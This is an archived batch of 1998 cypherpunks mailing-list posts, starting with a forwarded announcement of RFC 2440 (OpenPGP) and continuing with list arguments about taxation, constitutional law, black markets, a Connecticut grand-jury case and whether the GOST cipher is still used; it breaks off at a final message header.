Content-Type: multipart/mixed; boundary="Boundary..3998.1071713815.multipart/mixed"

--Boundary..3998.1071713815.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit



> -----Original Message-----
> From:	RFC Editor [SMTP:rfc-ed@ISI.EDU]
> Sent:	Wednesday, November 11, 1998 5:06 PM
> Cc:	rfc-ed@ISI.EDU
> Subject:	RFC 2440 on OpenPGP Message Format
> 
> 
> A new Request for Comments is now available in online RFC libraries.
> 
> 
>         RFC 2440:
> 
>         Title:	    OpenPGP Message Format
> 	Author(s):  J. Callas, L. Donnerhacke, H. Finney, R. Thayer
> 	Status:     Proposed Standard
> 	Date:       November 1998
>         Mailbox:    jon@pgp.com, lutz@iks-jena.de, hal@pgp.com,
> 		    rodney@unitran.com
> 	Pages:      65
>         Characters: 141371
>         Updates/Obsoletes/See Also: None
>         I-D Tag:    draft-ietf-openpgp-formats-08.txt
> 
>         URL:        ftp://ftp.isi.edu/in-notes/rfc2440.txt
> 
> This document is maintained in order to publish all necessary
> information needed to develop interoperable applications based on the
> OpenPGP format. It is not a step-by-step cookbook for writing an
> application. It describes only the format and methods needed to read,
> check, generate, and write conforming packets crossing any network.
> It does not deal with storage and implementation questions.  It does,
> however, discuss implementation issues necessary to avoid security
> flaws.
> 
> This document is a product of the An Open Specification for Pretty
> Good Privacy Working Group of the IETF.
> 
> This is now a Proposed Standard Protocol.
> 
> This document specifies an Internet standards track protocol for
> the Internet community, and requests discussion and suggestions
> for improvements.  Please refer to the current edition of the
> "Internet Official Protocol Standards" (STD 1) for the
> standardization state and status of this protocol.  Distribution
> of this memo is unlimited.
> 
> This announcement is sent to the IETF list and the RFC-DIST list.
> Requests to be added to or deleted from the IETF distribution list
> should be sent to IETF-REQUEST@IETF.ORG.  Requests to be
> added to or deleted from the RFC-DIST distribution list should
> be sent to RFC-DIST-REQUEST@RFC-EDITOR.ORG.
> 
> Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
> an EMAIL message to rfc-info@RFC-EDITOR.ORG with the message body 
> help: ways_to_get_rfcs.  For example:
> 
>         To: rfc-info@RFC-EDITOR.ORG
>         Subject: getting rfcs
> 
>         help: ways_to_get_rfcs
> 
> Requests for special distribution should be addressed to either the
> author of the RFC in question, or to RFC-Manager@RFC-EDITOR.ORG.  Unless
> specifically noted otherwise on the RFC itself, all RFCs are for
> unlimited distribution.echo 
> Submissions for Requests for Comments should be sent to
> RFC-EDITOR@RFC-EDITOR.ORG.  Please consult RFC 2223, Instructions to RFC
> Authors, for further information.
> 
> 
> Joyce K. Reynolds and Alegre Ramos
> USC/Information Sciences Institute
> 
> ...
> 
> Below is the data which will enable a MIME compliant Mail Reader 
> implementation to automatically retrieve the ASCII version
> of the RFCs. <<Untitled Attachment>> 


Date: Wed, 11 Nov 1998 18:11:07 -0500



ATT30256

--Boundary..3998.1071713815.multipart/mixed
Content-Type: application/octet-stream; name="bin00002.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00002.bin"
Content-Description: ""


--Boundary..3998.1071713815.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: "message/external-body"

Q29udGVudC10eXBlOiBtZXNzYWdlL2V4dGVybmFsLWJvZHk7CglhY2Nlc3Mt
dHlwZT0ibWFpbC1zZXJ2ZXIiOwoJc2VydmVyPSJSRkMtSU5GT0BSRkMtRURJ
VE9SLk9SRyIKCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbgpDb250ZW50LUlE
OiA8OTgxMTExMTQwNDAwLlJGQ0BSRkMtRURJVE9SLk9SRz4KClJFVFJJRVZF
OiByZmMKRE9DLUlEOiByZmMyNDQwCg==
--Boundary..3998.1071713815.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 16:39:56 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: most of what govts do can be done by business, and done (fwd)
In-Reply-To: <199811110156.TAA21708@einstein.ssz.com>
Message-ID: <3.0.5.32.19981111181139.0087e1a0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:56 PM 11/10/98 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 10 Nov 1998 18:00:44 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: most of what govts do can be done by business, and done
>>  better (Re: How to solve the tax problem w/o anarchy or force)
>
>> 	Roads are the easiest (assuming a government model) things to apply
>> road use taxes to, simply tax gasoline, oil, and tires. Scale your tire tax
>> based on weight and apply it to bicycles as well, then everyone (execpt
>> peds) who uses pays.
>
>Screw that, tax the shoes.

And every man (and woman) will be come a cobbler,,,

Reeza!

	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 16:47:00 +0800
To: b!X <cypherpunks@cyberpass.net
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
In-Reply-To: <199811102122.NAA18762@netcom13.netcom.com>
Message-ID: <3.0.5.32.19981111182325.00879d50@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:25 PM 11/10/98 -0800, b!X wrote:
>Yeah yeah all very well and good parody except that the 2nd amendment
>contains the word "well-regulated" and the 1st doesn't. 

Observe: --begin pasted text--

Amendment I
Congress shall make no law respecting an establishment of religion, or
prohibiting the free exercise thereof; or abridging the freedom of speech,
or of the press; or the right of the people peaceably to assemble, and to
petition the Government for a redress of grievances.


Amendment II
A well regulated Militia, being necessary to the security of a free State,
the right of the people to keep and bear Arms, shall not be infringed. 

--end pasted text--

While the 2nd does say "well regulated", it should also be pointed out that
the 1st does not say "right OF THE PEOPLE", except in the freedom of
assembly clause.

>(And yes I know I'm asking for a shitstorm of trouble saying that on THIS
>list of all places).

So why did you?

Reeza!

	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 12 Nov 1998 08:23:04 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Nationalized Public Radio
Message-ID: <364A22E6.75DEB52B@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



National Public Radio (NPR) today announced the appointment of Kevin
Klose as the next President and CEO of NPR. His stint at The Washington
Post included a position as Moscow Bureau Chief. He is currently
Director of the US International Broadcasting Bureau (IBB).

No need to hide your shortwave under the floorboards anymore, Voice of
America is now on the FM airwaves. Story at:

http://www.npr.org/inside/press/981111.klose.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Thu, 12 Nov 1998 09:53:27 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: DCSB: Mary Ellen Zurko; Jonah, IBM, Open Source, and Digital Commerce
In-Reply-To: <v04020a55b26fbabf92b8@[139.167.130.247]>
Message-ID: <Pine.LNX.3.96.981111192233.408D-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 11 Nov 1998, Robert Hettinga wrote:

>           The Digital Commerce Society of Boston
> 
>                        Presents
> 
>                      Mary Ellen Zurko
> 
> Mary Ellen Zurko is Security Architect at Iris, the folks who brought you
> Lotus Notes.

I suggest she be hung by her toes until she repents for that
abomination.

;-)

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Thu, 12 Nov 1998 10:01:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect) (fwd)
Message-ID: <Pine.LNX.3.96.981111192646.408E-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain




** forwarded as requested **


---------- Forwarded message ----------
Date: Wed, 11 Nov 1998 19:04:57 -0600 (CST)
From: Jim Choate <ravage@einstein.ssz.com>
To: Jim Burnes <jvb@ssds.com>
Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect)


If you want a responce post it publicly.

> 
> On Mon, 9 Nov 1998, Jim Choate wrote:
> 
> > > 	I am willing to pay for fire protection. I am not willing to pay
> > > for "universal health care", "welfare", and other such nonsense.
> > 
> > The Constitution happens to mention that the federal government is detailed
> > with taking care of the general welfare. If you don't like that sort of stuff
> > then get a Constitutional amendment passed.
> > 
> 
> Wow.  He said it.  This proves that Jim hasn't really read any history
> since public high school.
> 
> Actually this is the central fallacy of those that haven't bothered to
> actually read the federalist papers, the anti-federalist papers or the
> constitution, much less say how it should be amended. 
> 
> If a constitutional amendment had to have been passed it would have been
> to give the federal government unlimited power to do what they believe is
> in the interests of our general welfare.   Madison explicitly addressed
> the issue of unlimited federal power emanating from the welfare clause.
> 
> Had the supreme court bothered to read the founder's writings on this
> they would have found it in a week or two.  That's assuming their
> conclusion was not already decided.
> 
> The constitution is a document that enumerates the powers of the federal
> government.  It is very specific.  As Madison stated, if the general
> welfare clause meant what the socialist engineers wished it meant, there
> would have been no need to enumerate the specific powers of the federal
> government.  In fact, it would have been as if the founding fathers had
> said: 
> 
> "The federal government has unlimited power to do whatever it
> feels necessary."
> 
> "The powers of the federal government are as follows"
> 
> (1) 
> (2)
> (3) etc
> 
> Which would be ridiculous on its face.
> 
> The reality of the situation is that Roosevelt kept trying to stack the
> Supreme Court.  He eventually suceeded in appointing his socialist
> crony judges to "reinterpret" the constitution.  The first result
> of this was that Social (in)Security was ruled constitutional because
> it was in "the general welfare".
> 
> This was probably the last nail in the coffin of the Republic.  The first
> nail was imposing huge export duties on cotton in order to limit demand
> outside the country -- in effect driving down cotton prices so it could be
> had cheaply by the northern industrial (clothing/textile) markets. 
> Southern states saw this as blatant price controls.  In their inability to
> change the taxes they sought to leave the union.  A prime example of the
> old adage -- "the power to tax is the power to destroy".  In this case it
> was destroying the union itself.  Only after the war was on did the north
> use the anti-slavery propaganda to peddle their cause.  And use it to good
> advantage they did.  I'm glad the slaves were emancipated, but I wish
> it were done with less blood and more foresight.
> 
> Bear in mind that as a libertarian I view slavery as one of the ultimate
> evils.  However, the northern industrialists had no leg to stand on
> because they were one of the prime beneficiaries of cheap labor and thus
> cheap cotton prices during the era of westward expansion.  Never mind that
> only the wealthy in the south owned slaves.  If that was so, why was the
> opposition to the feds so virulent? 
> 
> By 1913, Jekyl Island was a done deal.  The income tax and the federal
> reserve banking system were unleashed.  A concise discussion of this is
> beyond the scope of this posting.  Needless to say centralized federal
> power was on the move.  The system of institutionalized fiat currency was
> one of the main causes of the 1929 crash that put Roosevelt in power.  It
> was that "government breaks your leg, government hands you a crutch,
> government becomes savior"  mentality that resulted in the endless cycle
> of market distortions and power grabs that put us where we are now. 
> 
> Does this mean that Roosevelt was "evil".  No.  Just that, as one
> playwrite once said, "the conflict of good against good is much more
> interesting".  Well-intentioned "good people" have contributed more to the
> misery of the human race that any other factor alone.  I'm sure that
> Roosevelt felt he was doing "good" when he undid the Republic.  His
> crowning achievment was his stacking of the Supreme Court and the
> resulting unlimited expansion of federal power.  If this country survives
> Y2K it will have to contend with the issue that the scope of the federal
> government's power is not unlimited.  Something has got to give.  Y2K
> seems as likely a bifurcation and surfaction point as any. 
> 
> Maybe Hettinga is right.  Economics, like physics obeys the "reality is
> not an option" rule.  When centralized bureacracy becomes too expensive
> the invisible hand will select something more efficient. 
> 
> jim
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 12 Nov 1998 03:09:34 +0800
To: cypherpunks@toad.com
Subject: GOST still used?
Message-ID: <199811111837.TAA12319@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone report whether GOST is still used anywhere?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 10:16:47 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can call it that) [CNN] (fwd)
Message-ID: <199811120155.TAA27276@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 20:59:11 -0500 (EST)
> From: Rabid Wombat <wombat@mcfeely.bsfs.org>
> Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can call it that) [CNN]

> Why would this be "unconstitutional?"

Juries are to be composed of your peers taken from the community in which
the crime occurred. A single judge doesn't make a jury of ones peers.

> Are you at all familiar with the case? There seems to be a fair amount of 
> evidence, circumstantial or otherwise, that would indicate a certain 
> politically and financially powerful family used its influence to keep 
> the two prime suspects in the case from coming to trial for over 20 
> years.

Irrelevant, one doesn't throw away the justice system because it might have
been abused. One wrong does not justify another.

> One judge is better than nothing. OTOH, maybe a football, a few pine 
> trees, and some vertical slope would do justice. 

Actualy 10 guilty men walking free is better than one innocent man in jail,
or a justice system that gets abused.

> (Or do you think there should be a statute of limitations involved?) 

Irrelevant.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 12 Nov 1998 13:23:52 +0800
To: cypherpunks@toad.com
Subject: Re: GOST still used?
In-Reply-To: <199811111837.TAA12319@replay.com>
Message-ID: <3.0.5.32.19981111195910.008ba910@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:37 PM 11/11/98 +0100, Anonymous allegedly wrote:
>Can anyone report whether GOST is still used anywhere?

If you're asking "_Should_ I use GOST?", the answer is 
"No, not unless you really, really understand it,
and there's something it does much better for you than
more open cryptosystems, such as 3DES, RC4, or Blowfish."

GOST isn't just one cryptosystem; it's a family with different S-Boxes,
one or more sets for the Soviet military, one set commonly seen publicly,
some sets made by software writers, etc.
The strength depends critically on the values chosen for the S-Boxes,
and the Soviet military kept theirs secure.

Maybe the Russian Army or other ex-Soviet countries' armies use it,
and maybe the KGB understood it well enough for this to be ok,
if you think trusting the KGB or Soviet Military Intelligence
for advice on cryptosystems can make something ok...

But even if you understand the algorithm well enough to 
know how strong it is, and that's strong enough for you, why bother?
There are publicly analyzed algorithms that are strong enough
and well-analyzed, like 3DES, and algorithms that are fast and strong,
like Blowfish or correctly-used RC4.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 10:55:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect) (fwd)
Message-ID: <199811120230.UAA27385@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 19:27:21 -0700 (MST)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: "social responsibility" was (dbts: Privacy Fetishes, Perfect) (fwd)

> > Actually this is the central fallacy of those that haven't bothered to
> > actually read the federalist papers, the anti-federalist papers or the
> > constitution, much less say how it should be amended. 

That's an easy way to brush aside having to prove your point. Especialy
after having drawn a completely illogical and incorrect conclusion like
this.

> > If a constitutional amendment had to have been passed it would have been
> > to give the federal government unlimited power to do what they believe is
> > in the interests of our general welfare.

This sentence makes no sense, mind rewording it so I know specificaly what
it is your talking about. No amendment has to be passed.

>   Madison explicitly addressed
> > the issue of unlimited federal power emanating from the welfare clause.

Would you mind explaining where providing for the *general* welfare equates
to unlimited powers? No government has unlimited powers and providing for
the general welfare can't honestly be extrapolated to that conclusion.
Within the context of the Constitution general welfare is in reference to
building a framework for the expression of life, liberty, and the pursuit of
happiness.

> > Had the supreme court bothered to read the founder's writings on this
> > they would have found it in a week or two.  That's assuming their
> > conclusion was not already decided.

Found what? Whose conclusions, the founding fathers or the sitting supremes?

> > The constitution is a document that enumerates the powers of the federal
> > government.  It is very specific.

And prohibits the enumeration of individual liberties by the same
government. Rather handy little situation that, since it completely blows
holes in any move to derive totalitarian control (which by the way is not
democratic).

  As Madison stated, if the general
> > welfare clause meant what the socialist engineers wished it meant, there
> > would have been no need to enumerate the specific powers of the federal
> > government.

Well to be accurate there was no enumeration of the specific powers in the
original Constitution, it's why Jefferson (who was in France at the time),
Madison, and others fought and supported the Bill of Rights. Because of the
9th and 10th such moves are inherently doomed to failure.

  In fact, it would have been as if the founding fathers had
> > said: 
> > 
> > "The federal government has unlimited power to do whatever it
> > feels necessary."
> > 
> > "The powers of the federal government are as follows"
> > 
> > (1) 
> > (2)
> > (3) etc
> > 
> > Which would be ridiculous on its face.

This entire section is ridiculous. To say on one hand the powers are
unlimited and then to proceed to list them weakens the argument, this was
also the reason for the 10th. It prevents such extrapolations as this.

> > The reality of the situation is that Roosevelt kept trying to stack the
> > Supreme Court.

Wow, I didn't realize Roosevelt was even alive to participate in the
original Constitutional debates.

I'm going to stop here since we are obviously off on one of your pet peeves
that isn't related to the discussion at hand. To jump 150 years in one fell
swoop is pretty extraordinary. The reality is, as Jefferson himself said,
that the laws of one generation aren't the laws of another.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 11:18:17 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811120005.SAA26844@einstein.ssz.com>
Message-ID: <v04011719b26fd24ec0c7@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:05 PM -0500 11/11/98, Jim Choate wrote:
>Forwarded message:
>> 	So leaders should be able to do whatever they want within their own
>> borders w/out the possibility of being held responsible for what they do to
>> citizens of other countries who just happen to be visiting?
>
>Absolutely. It's what is meant by indipendent nation. It's between the leaders
                                     ^^^
	Freudian slip? (no, I am not harrassing you about spelling, I don't
have the moral authority on that point.

>and the citizens.
>
>> 	What about rule by law?
>
>What about it? I don't believe in one world governments, it's a bad idea.
>Within the confines of a given country there should be a rule of law, that
>rule should not necessarily be the same as any other country. And other
>countries should most definitely NOT have a say in it.

	There is an expectation that when one travels, one is protected by
certain laws, at least the laws of the country that one is traveling to.

	There are also certain types of crimes that are so morally
reprehensible that to allow them to continue is not possible.

	Or are you willing to go on record as stating that what Stalin did
to the Jews (or Hitler for that matter) was acceptable, since we shouldn't
have a say in their laws?

>Do you want Germany having a say in our laws (for example)?

	They do already, it's called international trade.

	Also, if I were a Catholic in a death camp because Jesse Helms
ramed thru legislation blaming the Y2K bug on the Holy C, I'd hope someone
would intervine.

>> 	That was not the point, the point was about black market goods.
>No, the point was about freedom of choice.

	My comments were in regard to black market goods.

>
>> 	So then you admit you were lying about the deaths and blindness
>> being the cause of regulation, since you claimed it happend in the late
>> 1800's & early  1900's, but the regualtion and taxing went all the way back
>> to the middle ages?
>
>Taxing went on, the regulation of alcohol production didn't occur in this
>country until after the Civil War. Taxing alcohol is a whole different issue
>than regulating the quality and methods of production, and is most certainly
>not equivalent to regulations on where it might be sold and under what
>conditions.

	But you claimed it started in the early 1900's in response to
deaths and blindness.

>> prevents businesses from using the Press to manipulate the
>> government into doing something about a problem that doesn't exist.
>
>No it doesn't. The press is a business, and if you don't think they don't
>try to manipulate more than the government you're in for a surprise. There
>are cases of the press being manipulated because of the impact of certain
>story presentation lines on their income.

	It prevents the press from manipulating the government because
there ISN'T ONE, or if there is (in the case of extreme
libertarian/minarchist) it is so restricted and powerless it can't do
anything execpt try to gather more power.

	Yes, businesses can manipulate the press, and do-gooders can always
start their own press and fight back.

>> >whistle-blowers and 'social do-gooders' to get their message out (unless
>> >they're well heeled and don't mind loosing it all in the process).
>> 	That is already/still the case. You piss off the wrong people, you
>> die.
>
>Actualy not, there are a variety of whistle-blower laws on the book at every
>level. Also the number of whistle-blowers who are killed currently are

	Yeah, and there are laws against Drug Dealing which work real well.

>pretty small (name 3). A lot of them loose the jobs they blew the whistle on

	I wanna say Karen something or other as one case--Silkwood?

	Point still holds, you speak out, you get in trouble, legal or no.
Laws don't prevent things from happening, they simply give society the
moral authority to say "We Warned You, Now Off With His Head" or some such.

	When was the last time you _didn't_ kill someone just because it is
illegal? It's only been like twice in my life. Well, and another time a
buddy took the gun out of my hands.

>but that is many cases is to be expected (after all if the issue is important
>enough the business will cease to exist).

	It's expected, but illegal?

>> 	It INHERENTLY recognizes it, and inherently limits it.
>
>No it doesn't, it does not in any way prevent abuse and further provides no
>mechanism for the restitution or correction of that abuse.

	It prevents government abuse, it prevents systemic abuse of power
and authority.

	It also makes it easier to get people to resist abuse & to fight
back, since the abuse isn't built in, nor do the abusers have any sort of
"authority" to fall back on.

>> 	No one has the power.
>> 	THAT'S THE POINT.
>No, the point is that whoever is the most ruthless will get ahead. If you

	Which is different from now HOW?

	Isn't Billy Gates one of your poster boys for being ruthless? Isn't
he so far head of the rest of us that he could be in court for the rest of
his life and not spend everything?

	Yeah, the current system really prevents the ruthless from getting
ahead.


>> 	Some agendas can't be pushed thru business, or at least not the
>> same way.
>
>Such as? Greed and profit always can be pushed through business, it's what
>they do.

	Damn, had one when I wrote that. Shit should have sited it. It
basically fell into "at least not the same way".

	Greed is not an agenda, it is an emotion, Profit is an agenda.

>> 	If I got them legally, they were a legal commodity, if I dispose of
>> them legally, they move from the "white" market, to the "black" market.
>Which requires that yot mislead the doctor as to why you want them.

	No it doesn't. I just showed you an example of one way to not
mis-lead the doctor (I fully inteneded on taken the pills, I just didn't
like them) a doctor and still get the meds.

>> 	The fact that not everything on the black market was stolen ISN'T
>> the point, the point is that there can be things on the black market that
>> aren't stolen, and aren't inherently illegal (tomatoes, vicadan, alcohol)
>> but are still part of the black market because of the nature of the market
>> and the legal system.
>Why would anyone buy a commenly available item on the black market when they
>could go to the corner store and purchase it? They won't. People who are

	You can sometimes find people in Chicago selling cigerattes out of
the trunks of their car. Allegedly this were purchased in a state (Indiana
or Michigan) with lower taxes, and carried across state lines (which is
illegal, if done for purpose of sale) to be sold for less than taxed
cigarettes here.

	I can't speak more to this specifically since I don't know any more.

>involved in the black market are there for profit. If they go down to the
>store and buy say tomatoes at $2/lb. whey would they sell them to you at
>$1.75/lb? They wouldn't. The alcohol and cigarettes you buy on the black
>market lack tax stamps are have bogus stamps. Why? Becuase the cost is much
>lower without the added tax and legitimate distribution expenses.

	Sometimes they don't bother with the stamps. This also doesn't mean
that the product is stolen, it could simply be purchased in bulk in a lower
cost market & transported.

	Kinda like Blue Jeans in the USSR.

>> 	FUCKING BULLSHIT. YOu JUST brought introduced your thesis that even
>> if most stuff isn't actually stolen, then it is bought with money gained by
>> theft in your last post on this issue.
>
> Before that you were maintaining
>> that everything on the black market had to be stolen, and in fact this
>
>No, go back - I never said that. I have continously said that the majority
>of items on the black market are related to a stolen service or product.
>I stand by that statement.

You said:
>Actualy a black market is usualy goods gotten through theft or other illegal
>means, not necessarily anything related to how or what is sold. If you don't
>corrupt free-market to include legitimizing theft as a viable market
>strategy then yes, you can in fact have a black market in a free-market.

	Now, I took that to mean "The black market is usually trade in
goods aquired thru theft or other illegal means", rather than "the black
market is usually comprised of goods related to a stolen service, or
product, or are paid for by money aquired the same way", this was in
response to a query were I said:

	Assuming your definition of "free market" is "a market without
regulation", you can't have a black market in a free market since a black
market is trade in violation of regulations.

	In other words, a Black market is when you trade either illegal
goods illegally, or legal goods illegally.

	If there are no illegal goods, and there is no regulations limiting
trading, then the black market cannot exist.

>I'd go on but it's been a long day and I'm in no mood for this petty
>bickering.

	Yes, it has been a long day, and I'm in the mood to blow large
holes in things, but my boss won't let me go to Boston (well, burlington)
just yet.

	I just hope you're a better programmer than those schmucks at where
we bought our latest peice of shit e-commerce package.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 11:27:24 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you cancall it that) [CNN] (fwd)
In-Reply-To: <199811120155.TAA27276@einstein.ssz.com>
Message-ID: <v0401171cb26feee07782@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:55 PM -0500 11/11/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 11 Nov 1998 20:59:11 -0500 (EST)
>> From: Rabid Wombat <wombat@mcfeely.bsfs.org>
>> Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can
>>call it that) [CNN]
>
>> Why would this be "unconstitutional?"
>
>Juries are to be composed of your peers taken from the community in which
>the crime occurred. A single judge doesn't make a jury of ones peers.

	Jim, "Grand Jury", a jury to see if there is enough evidence to
warrant a full trial.

>Irrelevant, one doesn't throw away the justice system because it might have
>been abused. One wrong does not justify another.

	Correct, but this isn't a guilty or innocent trial, this is a "is
there enough evidence to try this person" type trial.

	This judge can't throw the perp in jail, only throw another trial
where there will be 12 to judge.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 12 Nov 1998 10:21:24 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Elder Kennedy ordered to tesify to Grand Jury (if you can call it that) [CNN]
In-Reply-To: <199811110414.WAA22671@einstein.ssz.com>
Message-ID: <Pine.BSF.3.91.981111205248.11253A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Why would this be "unconstitutional?"

Are you at all familiar with the case? There seems to be a fair amount of 
evidence, circumstantial or otherwise, that would indicate a certain 
politically and financially powerful family used its influence to keep 
the two prime suspects in the case from coming to trial for over 20 
years.

One judge is better than nothing. OTOH, maybe a football, a few pine 
trees, and some vertical slope would do justice. 

(Or do you think there should be a statute of limitations involved?) 

-r.w.

On Tue, 10 Nov 1998, Jim Choate wrote:

> Forwarded message:
> 
> > X-within-URL: http://www.cnn.com/US/9811/10/kennedy.testimony.ap/
> 
> >    STAMFORD, Connecticut (AP) -- A Florida judge on Tuesday ordered the
> >    elderly brother of Ethel Kennedy to testify before a Connecticut grand
> >    jury investigating a 1975 slaying in which his two sons are suspects.
> >    
> >    Rushton Skakel, 74, of Hobe Sound, Florida, was ordered to testify
> >    about what he knows about the slaying of Martha Moxley, a 15-year-old
> >    Greenwich girl who was bludgeoned to death with a golf club.
> 
> ...
> 
> >    The case stalled for years but was revived this spring by the
> >    appointment of a grand jury consisting of a single judge.
> 
> [remainder deleted]
> 
> Now if that isn't unconstitutional I don't know what is. He and his lawyer
> should be screaming bloody murder (figuratively).
> 
> 
>     ____________________________________________________________________
>  
>             Lawyers ask the wrong questions when they don't want
>             the right answers.
> 
>                                         Scully (X-Files)
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Fri, 13 Nov 1998 04:05:46 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Cylink Sued for Stock Fraud
In-Reply-To: <199811111641.LAA06325@camel14.mindspring.com>
Message-ID: <v04003a00b2702c47fde9@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>Business Wire reported yesterday that Cylink has been
>sued in US District Court of New Jersey for securities
>fraud through a class action. It alleges misrepresentation
>and false financial statements.

I heard, from a former senior employee, a week or so ago that things were
not well there, but had no idea it was this bad (ir I would have shorted
the stock, oh well).

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 13:09:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
